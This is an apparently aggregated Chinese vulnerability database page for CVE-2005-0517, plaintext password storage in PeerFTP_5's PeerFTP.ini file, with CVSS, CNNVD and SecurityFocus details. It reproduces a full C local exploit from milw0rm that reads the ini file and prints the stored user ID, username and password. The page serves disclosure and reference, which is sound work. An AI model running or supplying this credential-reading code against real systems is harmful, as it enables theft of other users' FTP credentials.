CVE-2005-0517
CVSS2.1
发布时间 :2005-02-23 00:00:00
修订时间 :2008-09-05 16:46:31
NMCOES    

[原文]PeerFTP_5 stores sensitive information such as passwords in plaintext in the PeerFTP.ini files, which allows local users to gain privileges.


[CNNVD]PeerFTP_5不安全的密码存储漏洞(CNNVD-200502-087)

        PeerFTP是一款文件共享系统。利用该软件你可以轻松实现与朋友或者同事之间的快文件速共享。
        PeerFTP_5将密码之类的敏感信息以纯文本格式存储在PeerFTP.ini文件中,这可让本地用户获取特权。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0517
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0517
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-087
(官方数据源) CNNVD

- 其它链接及资源

http://securitytracker.com/id?1013263
(VENDOR_ADVISORY)  SECTRACK  1013263

- 漏洞信息

PeerFTP_5不安全的密码存储漏洞
低危 配置错误
2005-02-23 00:00:00 2005-10-20 00:00:00
本地  
        PeerFTP是一款文件共享系统。利用该软件你可以轻松实现与朋友或者同事之间的快文件速共享。
        PeerFTP_5将密码之类的敏感信息以纯文本格式存储在PeerFTP.ini文件中,这可让本地用户获取特权。

- 公告与补丁

        暂无数据

- 漏洞信息 (833)

PeerFTP 5 Local Password Disclosure Exploit (EDBID:833)
windows local
2005-02-22 Verified
0 Kozan
N/A [点击下载]
/*****************************************************************

PeerFTP_5 Local Exploit by Kozan

Application: PeerFTP_5
Vendor: Acute Websight Incorporated
http://www.acutewebsight.com/peerftp_5.htm
Vulnerable Description: PeerFTP_5 discloses passwords to local users.

Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <windows.h>
#include <stdio.h>
#include <string.h>

#define BUFSIZE 100
HKEY hKey;
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

char *userid1, *username1, *password1;

int adresal(char *FilePath,char *Str)
{
       char kr;
       int Sayac=0;
       int Offset=-1;
       FILE *di;
       di=fopen(FilePath,"rb");

       if( di == NULL )
       {
               fclose(di);
               return -1;
       }

       while(!feof(di))
       {
               Sayac++;
               for(int i=0;i<strlen(Str);i++)
               {
                       kr=getc(di);
                       if(kr != Str[i])
                       {
                               if( i>0 )
                               {
                                       fseek(di,Sayac+1,SEEK_SET);
                               }
                               break;
                       }
                       if( i > ( strlen(Str)-2 ) )
                       {
                               Offset = ftell(di)-strlen(Str);
                               fclose(di);
                               return Offset;
                       }
               }
       }
       fclose(di);
       return -1;
}

char *oku(char *FilePath,char *Str)
{

       FILE *di;
       char cr;
       int i=0;
       char Feature[500];

       int Offset = adresal(FilePath,Str);

       if( Offset == -1 )
               return "";

       if( (di=fopen(FilePath,"rb")) == NULL )
               return "";

       fseek(di,Offset+strlen(Str),SEEK_SET);

       while(!feof(di))
       {
               cr=getc(di);
               if(cr == ',')
                       break;
               Feature[i] = cr;
               i++;
       }

       Feature[i] = '\0';
       fclose(di);
       return Feature;
}

int main(void)
{
       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                   "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                   0,
                   KEY_QUERY_VALUE,
                   &hKey) == ERROR_SUCCESS)
   {

               lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
                                                      (LPBYTE) prgfiles, &dwBufLen);

       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
               {
                       RegCloseKey(hKey);
                       printf("An error occured!\n");
           exit(1);
       }

       RegCloseKey(hKey);

   }
       else
       {
       RegCloseKey(hKey);
               printf("An error occured!\n");
       exit(1);
   }

       strcat(prgfiles,"\\AcuteWebsight\\PeerFTP_5\\PeerFTP.ini");

       printf("PeerFTP_5 Local Exploit by Kozan\n");
       printf("Credits to ATmaCA\n");
       printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
       printf("This exploit only show the first profile and its password.\n");
       printf("You may improve it freely...\n\n");
       try{

       userid1=oku(prgfiles,"]=");
       printf("UserID 1   : %s\n",userid1);

       char username_temp[BUFSIZE];
       wsprintf(username_temp,"%s,",userid1);
       username1=oku(prgfiles,username_temp);
       printf("UserName 1 : %s\n",username1);

       char pass_temp[BUFSIZE];
       wsprintf(pass_temp,"%s,",username1);
       password1=oku(prgfiles,pass_temp);
       printf("Password 1 : %s\n",password1);

       }catch(...){ printf("An error occured!\n"); exit(1); }

       return 0;

}

// milw0rm.com [2005-02-22]
		

- 漏洞信息

14088
PeerFTP_5 PeerFTP.ini User Credential Local Disclosure
Local Access Required Cryptographic, Information Disclosure
Loss of Confidentiality Solution Unknown
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-22 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

PeerFTP_5 Insecure Password Storage Vulnerability
Configuration Error 12670
No Yes
2005-02-26 12:00:00 2009-07-12 10:56:00
kozan@netmagister.com is credited with the discovery of this issue.

- 受影响的程序版本

PeerFTP_5 PeerFTP_5

- 漏洞讨论

A local insecure password storage vulnerability affects PeerFTP_5. This issue is due to a failure of the application to store password with secure permissions by default.

A local attacker may leverage this issue to gain access to authentication credentials for FTP user accounts, facilitating unauthorized access.

- 漏洞利用

No exploit is required to leverage this issue.

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站